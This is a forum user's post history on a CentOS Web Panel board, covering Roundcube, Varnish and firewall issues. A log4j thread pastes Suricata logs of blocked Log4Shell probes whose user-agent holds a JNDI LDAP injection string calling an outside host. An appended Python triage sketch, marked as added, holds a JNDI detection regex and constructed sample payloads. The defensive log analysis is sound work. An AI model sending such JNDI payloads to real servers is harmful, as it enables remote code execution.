Messages - tomkolp

1
E-Mail / Re: Roundcube update not working due to php version of cwpsrv
« on: January 13, 2023, 12:10:54 PM »
Cwpsrv has its own fpm. The service is called cwpsrv-phpfpm and cwp-phpfpm. They use /usr/local/cwp/php71 (it's actually 7.2). I'm working on an update for you, but work 60 hours a week, so not a lot of time.
Do you know when the new version of Roundcube will be available? How to completely disable Roundcube in CWP when CVE vulnerabilities appear in the outdated version 1.5.3?

2
How to / Re: Cronjob for WPallimport
« on: August 09, 2022, 09:48:37 AM »
I use curl and it works. Connect via ssh and type in the console, or show the cron logs.

3
I wanted to update Roundcube to 1.6, but Roundcube requires a minimum PHP version of 7.3. Unfortunately, version 1.5.3 is the last one working.

4
CSF Firewall / Re: lfd: (WPLOGIN) WP Login Attack (false positives)
« on: May 14, 2022, 12:18:55 PM »
I have the same problem. My WordPress has an additional security of 2FA. Therefore, each login generates two entries. Just log in -> log out -> log in again to be blocked. Preventing my country from being blocked is not a good solution.

5
Hi friends ...

We have had some problems with varnish ...
----------------------------------------------------
Error 503 Backend fetch failed

Backend fetch failed
Guru Meditation:

XID: 1279924
----------------------------------------------------

We use the webserver configuration nginx-varnish-apache-php-fpm...
After some study/investigation on the internet we found recommendations for some changes in config files ...

We have added them to the file: /etc/varnish/default.vcl
and we have also added them to the file: /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl


Then we have updated all domains in CWP > WebServers Domain Conf
And all changes from default.vcl or default.tpl were updated in all domain files: /etc/varnish/conf.d/vhosts

After this everything was OK and Error 503 Backend fetch failed .... came only very rarely ....


But the biggest problem is that after some time (maybe after a CWP update) the config files were rewritten to the old ones ...
the file: /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl
and
all domain files: /etc/varnish/conf.d/vhosts

All our changes were lost ...

Please why ???

We think that it is very BAD!!!

Can you do something with this ???

Thanks

Juraj
I have the same problem with Varnish. Can I ask for information on what should be changed in these templates?

6
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:40:31 AM »
External firewall

7
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:15:44 AM »
I'm joining this question. I also do not know if CWP is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
Code:
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
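
A triage sketch for log lines like the ones in the post above, added here as an example and not part of the original post: it groups the syslog-wrapped Suricata EVE alerts by `flow_id`, records which signature IDs fired, pulls the JNDI callback host out of the HTTP fields, and lists flows where an alert was not blocked inline. The sample lines, the addresses and the `callback.example.invalid` host are constructed; the helper names are hypothetical.

```python
import json
import re

# Plain (non-obfuscated) JNDI lookup, as seen in the post's http_user_agent field.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}:]+)", re.IGNORECASE)

def _eve(flow_id, sid, action, user_agent):
    """Build one constructed syslog-wrapped EVE alert line (not real traffic)."""
    event = {"event_type": "alert", "flow_id": flow_id, "src_ip": "192.0.2.10",
             "alert": {"action": action, "signature_id": sid},
             "http": {"url": "/", "http_user_agent": user_agent}}
    return "2021-12-12T00:57:22 suricata[1] " + json.dumps(event)

# Constructed sample: one fast-log line, three alerts on a blocked flow,
# and one alert on a flow that was only alerted on (action "allowed").
UA = "${jndi:ldap://callback.example.invalid/a}"
SAMPLE_LINES = [
    "2021-12-12T00:57:22 suricata[1] [Drop] [1:2034649:1] sample {TCP} 192.0.2.10:1 -> 198.51.100.5:80",
    _eve(1001, 10006897, "blocked", UA),
    _eve(1001, 2034649, "blocked", UA),
    _eve(1001, 2034647, "blocked", UA),
    _eve(1002, 2034647, "allowed", UA),
]

def summarize(lines):
    """Group EVE alerts by flow_id; return {flow_id: summary dict}."""
    flows = {}
    for line in lines:
        start = line.find('{"')  # EVE JSON starts here; fast-log lines have none
        if start == -1:
            continue
        try:
            event = json.loads(line[start:])
        except ValueError:
            continue  # truncated or non-JSON line
        if event.get("event_type") != "alert":
            continue
        flow = flows.setdefault(event["flow_id"], {
            "src_ip": event.get("src_ip"), "sids": set(),
            "blocked": True, "callbacks": set()})
        alert = event.get("alert", {})
        flow["sids"].add(alert.get("signature_id"))
        flow["blocked"] = flow["blocked"] and alert.get("action") == "blocked"
        for value in event.get("http", {}).values():
            if isinstance(value, str):
                for scheme, host in JNDI_RE.findall(value):
                    flow["callbacks"].add((scheme.lower(), host.lower()))
    return flows

def needs_followup(flows):
    """Flows where at least one matching alert was not blocked inline."""
    return sorted(fid for fid, f in flows.items() if not f["blocked"])
```

Several signatures firing on one request, as in the post, collapse into a single flow entry, so the count of flows rather than the count of log lines reflects how many requests were seen.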

8
CentOS-WebPanel GUI / Re: Security incidents will not load
« on: November 29, 2021, 07:13:29 AM »
Security incidents will not load in CWPpro version: 0.9.8.1102
Code:
Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at HTMLDocument.<anonymous> (index.php?module=security_center:2881)
    at n (js.php:2)
    at Object.fireWith (js.php:2)
    at Function.ready (js.php:2)
    at HTMLDocument.B (js.php:2)

9
CentOS-WebPanel GUI / Security incidents will not load
« on: November 23, 2021, 12:53:39 PM »
Security incidents will not load in CWPpro version: 0.9.8.1102
